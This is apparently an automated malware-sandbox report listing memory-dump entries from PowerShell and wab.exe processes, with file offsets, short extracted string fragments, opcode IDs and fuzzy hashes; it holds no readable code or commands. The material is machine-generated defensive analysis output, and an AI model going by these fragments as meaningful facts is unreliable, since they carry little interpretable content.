                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1372607265
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1372607265
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$x.wk$x.wk$-wk
                                                        • API String ID: 0-3652276238
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-3833597934
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$tPkq$tPkq
                                                        • API String ID: 0-4290159910
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: 4'kq$4'kq$x.wk$-wk
                                                        • API String ID: 0-1611420318
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tPkq$tPkq$x.wk
                                                        • API String ID: 0-2827554479
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: d%qq$d%qq
                                                        • API String ID: 0-1943325001
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq$$kq
                                                        • API String ID: 0-3550614674
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `Bxk
                                                        • API String ID: 0-1425685151
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: h2yk
                                                        • API String ID: 0-3701754721
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $kq
                                                        • API String ID: 0-3037731980
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHkq
                                                        • API String ID: 0-902561536
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: tPkq
                                                        • API String ID: 0-145634721
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: PHkq
                                                        • API String ID: 0-902561536
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: x.wk
                                                        • API String ID: 0-117599076
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 03116f2f463c01d1ed04c3c468f97f528de9ef27b7418226749bdfcb9a91efc9
                                                        • Instruction ID: 5ccf9efecddb8488417dfff21a7f0a7fbd3d114c85c02428462ba9ef1947f578
                                                        • Opcode Fuzzy Hash: 03116f2f463c01d1ed04c3c468f97f528de9ef27b7418226749bdfcb9a91efc9
                                                        • Instruction Fuzzy Hash: 9A027CB4A00209CFD714CF98CA84E99BBF2BF99714F15C199E909AB355D732EC45CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0404c45545fd7e615b4ca52e467f87039bd08cf5ee6ae74ca2beed3755d9723e
                                                        • Instruction ID: 68b40d93baffcef71b61593c8f1f83936bfc20618d686e8a8e573a4ce3bbe7ee
                                                        • Opcode Fuzzy Hash: 0404c45545fd7e615b4ca52e467f87039bd08cf5ee6ae74ca2beed3755d9723e
                                                        • Instruction Fuzzy Hash: 92E12B74A00219DFDB15CF98C594A9EFBB2FF48311F248169E905AB366C771ED82CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d389e5ae0c9ea93346a14565edb4726c3e11feeae3609af3a3d58ab0cca04128
                                                        • Instruction ID: c912e8038645dfba2c55179468300cc4bb9cdc3dc73520296f893420f003c2ca
                                                        • Opcode Fuzzy Hash: d389e5ae0c9ea93346a14565edb4726c3e11feeae3609af3a3d58ab0cca04128
                                                        • Instruction Fuzzy Hash: A5B15A70E00209CFDB11CFA9C981BAEBBF1AF48315F14853EE915AB355EB749885CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bae5aaa9173139dc457f63d5c09848115f4a36e480b57ee10a7895a0cbd59b33
                                                        • Instruction ID: b1902ce1759e9eb49019612dde16e4ced1f70f53305224bb1aeaf5ea461713a4
                                                        • Opcode Fuzzy Hash: bae5aaa9173139dc457f63d5c09848115f4a36e480b57ee10a7895a0cbd59b33
                                                        • Instruction Fuzzy Hash: E981AD30B002158FCB15DFA8D940AAEBBF6FF88310F158569D5059B366DB35EC46CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: d3fb1b188ea6a5863af66802403dc2e18407e96f273acbb10852d7220595896f
                                                        • Instruction ID: b6ee0256b37f904a46d973944484d5d3288cff02380511d8a070e4431acceeb3
                                                        • Opcode Fuzzy Hash: d3fb1b188ea6a5863af66802403dc2e18407e96f273acbb10852d7220595896f
                                                        • Instruction Fuzzy Hash: 1F51AC34B002058FCB25EBA8D9506AEBBF6FFC4311F1581A9D805AB365DF359D46CBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: eba7acfe2d6cbcfec1ad155931bc48b198ec352398c37b0c20b851696db1e08a
                                                        • Instruction ID: 6608be456500ba218c139b4dd05502ab9b7a816c868916e19b363c6609b83e96
                                                        • Opcode Fuzzy Hash: eba7acfe2d6cbcfec1ad155931bc48b198ec352398c37b0c20b851696db1e08a
                                                        • Instruction Fuzzy Hash: 4041C470A05255CFCB01CF68C5909A9BBB1FF49310B2586AAD548EB352C371BC41CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e658f662af895e24a44f22b158fe4096eceaf284acd400bba5bcfd5c99a5ce01
                                                        • Instruction ID: 2e26361d1f1f4bd70c3da47b1f859f871c67ef83352c54e1353ce3446fc412d4
                                                        • Opcode Fuzzy Hash: e658f662af895e24a44f22b158fe4096eceaf284acd400bba5bcfd5c99a5ce01
                                                        • Instruction Fuzzy Hash: A2413A74A0124ADFCB15CF98C9849AEFBB2FF48310B24856AD905AB365D736EC45CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 611570ca717568195fa712798c6c515e1e4b5b11b533122de5a2a1cc7b10cc73
                                                        • Instruction ID: fe7f65a0872304b754b5bc06db3669f035146d9863e130994d84b0cd5572bccc
                                                        • Opcode Fuzzy Hash: 611570ca717568195fa712798c6c515e1e4b5b11b533122de5a2a1cc7b10cc73
                                                        • Instruction Fuzzy Hash: 8A215FB3B001298BD731AA6C5925AAEBB52EFE4314F1084B6D905DB745CE32DC45C3E1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 75e8c96d8af8496ed01bc95acad58ee5899d544ea9614fc32f41f9393e4b31cd
                                                        • Instruction ID: 99aa42ce56d9fd867ad1dd7e96e071f5a6f70cd5402baf7a159b8a291b17de4e
                                                        • Opcode Fuzzy Hash: 75e8c96d8af8496ed01bc95acad58ee5899d544ea9614fc32f41f9393e4b31cd
                                                        • Instruction Fuzzy Hash: EA3145B020D3C99FD7139B648C61B96BF309F23254F0980D7E544DF1A3EA289C49C722
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3023ca6f3ba749e85d3af4bdb12391d6c056644120580cb8f7855ad4713b33e0
                                                        • Instruction ID: 1cadb63d5571a52108f641159c2a0216a62c7ee6b1c3c3ef2638706325ea97d5
                                                        • Opcode Fuzzy Hash: 3023ca6f3ba749e85d3af4bdb12391d6c056644120580cb8f7855ad4713b33e0
                                                        • Instruction Fuzzy Hash: B901B1303052429FC72A9B68DA5446ABB72BEC620530584BEE242CB753CF35EC12CBC1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfb3c7a7a10f93d861deba2d700f2125f8f0018baee4026893131cd30f1008a9
                                                        • Instruction ID: 1dbe4a3648ccf403f3e376eb9cf6fcda8d4b4c12ac226c2ba67fd16b74b4478e
                                                        • Opcode Fuzzy Hash: bfb3c7a7a10f93d861deba2d700f2125f8f0018baee4026893131cd30f1008a9
                                                        • Instruction Fuzzy Hash: EE014030904209DFDB249FE0DA55AAEBBB2FF44302F21003DE202AB256DB754892CB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cb60717339bdcc94b768924573c8c2211703037dfc9494ee914b98d3aaf741c1
                                                        • Instruction ID: bb355b74b5e69547886931fcf9331e27409d5bc28d1fab102a78bc4e1dec33b0
                                                        • Opcode Fuzzy Hash: cb60717339bdcc94b768924573c8c2211703037dfc9494ee914b98d3aaf741c1
                                                        • Instruction Fuzzy Hash: 32014030A01219DFDB24AFE0C915AAE7BB2EB44306F114039E602AA256DB754842CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f68f31931968fdcc91da3214cd5165a3af0c6053b78c3d0666959336ce9efd6a
                                                        • Instruction ID: 9a5b223f39b0399131aaecd5ffcb26baef5bca2bac697f7070249e03ad173e60
                                                        • Opcode Fuzzy Hash: f68f31931968fdcc91da3214cd5165a3af0c6053b78c3d0666959336ce9efd6a
                                                        • Instruction Fuzzy Hash: 28F08C30A14209DFDB10DBE0DA55AAE3B75EF50305F21443EE2029B39BDE7558469B91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a3cd51f14506c094b5a1dd064c1249e4ca9bba585e41b5a4c7f92a5ef6d41738
                                                        • Instruction ID: 0fa57631266d98eca68a20e8865beba809a4590bc00d900125567eb75754d7cd
                                                        • Opcode Fuzzy Hash: a3cd51f14506c094b5a1dd064c1249e4ca9bba585e41b5a4c7f92a5ef6d41738
                                                        • Instruction Fuzzy Hash: F3F04F75B04155EBCB10DE48C990DA6FB61ABD9355F18C0AAE5088F252DB33DC52CB84
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e5ed9d27ff46e140f85d7408dfc3a87c4c82b9e9f6a5fc8164449228c9e8a9de
                                                        • Instruction ID: 4e24cdd8ec19852b95a5a5475b731370f4c36ef28b0019cb977a02d27b19c4fb
                                                        • Opcode Fuzzy Hash: e5ed9d27ff46e140f85d7408dfc3a87c4c82b9e9f6a5fc8164449228c9e8a9de
                                                        • Instruction Fuzzy Hash: 3DF03C34A11109DFCB24EFE0DA5AAAE7BB6FB48341F204139F602E7256DB744D52CB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4cddbdb5ed39ec331e0868b15862b7c03d0750388001520be118e3efceaec4bd
                                                        • Instruction ID: 5c525af7c2850b96eb24573956fe411eafe88469948ce9fc9b3a2ffde2a19b98
                                                        • Opcode Fuzzy Hash: 4cddbdb5ed39ec331e0868b15862b7c03d0750388001520be118e3efceaec4bd
                                                        • Instruction Fuzzy Hash: 18F09AE064D3C58FD7178B208CA5821BF30AE67140B1E81EBD084DF5E3EA199C0AC392
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 93e6ef6083b55e835a6798c490943c11e955fb363f7857c75090c227c5229d34
                                                        • Instruction ID: bce74f9459537722a8b094cdab9ad9b91957939398878ccb711370ae170d1ce8
                                                        • Opcode Fuzzy Hash: 93e6ef6083b55e835a6798c490943c11e955fb363f7857c75090c227c5229d34
                                                        • Instruction Fuzzy Hash: 5DF03C31901119EFCB24AFE4DA15AADBFB2FB54341F204029F602E6256DB744852DB91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 1503333736f715df27f060d62b3e8a32116bd2ccb08577c5d9b1e9060fd306b0
                                                        • Instruction ID: e72b1529fa804fb7af4c0980107e921abc13710288fbf2938c5578f3bb414b2c
                                                        • Opcode Fuzzy Hash: 1503333736f715df27f060d62b3e8a32116bd2ccb08577c5d9b1e9060fd306b0
                                                        • Instruction Fuzzy Hash: C3F03C30D00109EFCB24AFE4DA55A9E7FB1FB48341F204029F612E7256DB744852CF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46177205566a321368710d2e56d5a84b0e23ef8da056bce8ba0e717192a90fad
                                                        • Instruction ID: 762f621ce301e453972e3f93a896312ec53af41c3f3cd049f9a2875cd26a5280
                                                        • Opcode Fuzzy Hash: 46177205566a321368710d2e56d5a84b0e23ef8da056bce8ba0e717192a90fad
                                                        • Instruction Fuzzy Hash: 28F0F975A001049FCB05CB88D990DBEF776FF88324F148159EA15A73A5C732AC52CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53bbbaa384da7fac7c88eb66ef3881d0edf474542372c81892b27167a0bd92a8
                                                        • Instruction ID: f442cbff61ff62fb31174846be871975ff5ce86b2727f9e37b8e369f90a7bec7
                                                        • Opcode Fuzzy Hash: 53bbbaa384da7fac7c88eb66ef3881d0edf474542372c81892b27167a0bd92a8
                                                        • Instruction Fuzzy Hash: 97F01231911209DFCF249FD4DA15A9DBFB6FB54341F204029F602EB256DB744D51DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 004de2ff57dfa457d1a61ff9dbbe48563197bc777ec2df67a1434d2486e9129c
                                                        • Instruction ID: 7c985da37b28ed61a17b41104025be2e2e5982414577f8101584af3c1b01551a
                                                        • Opcode Fuzzy Hash: 004de2ff57dfa457d1a61ff9dbbe48563197bc777ec2df67a1434d2486e9129c
                                                        • Instruction Fuzzy Hash: 44F03031911209EFDF24DFE0DA5AAAE7FB5FB54341F204029F602EB256DB744852DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2122128189.00000000084F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 084F0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_84f0000_powershell.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.2118512475.00000000078D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078D0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_78d0000_powershell.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9e9cbf5732fa8ee51add44a73a9c1c2bab74de6e067245c900d7a306d483ccb7
                                                        • Instruction ID: 34fba4ca3b670c71ae16a3f2b79edbecd209f255ba9daf895e19bc6ade94c300
                                                        • Opcode Fuzzy Hash: 9e9cbf5732fa8ee51add44a73a9c1c2bab74de6e067245c900d7a306d483ccb7
                                                        • Instruction Fuzzy Hash: D9631A31D10B1A8ACB15EF68C980699F7B1FF99300F51D79AE44877225EF70AAC5CB81
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000009.00000002.2940184728.0000000022240000.00000040.00000800.00020000.00000000.sdmp, Offset: 22240000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_9_2_22240000_wab.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: \V*k
                                                        • API String ID: 0-2107984380
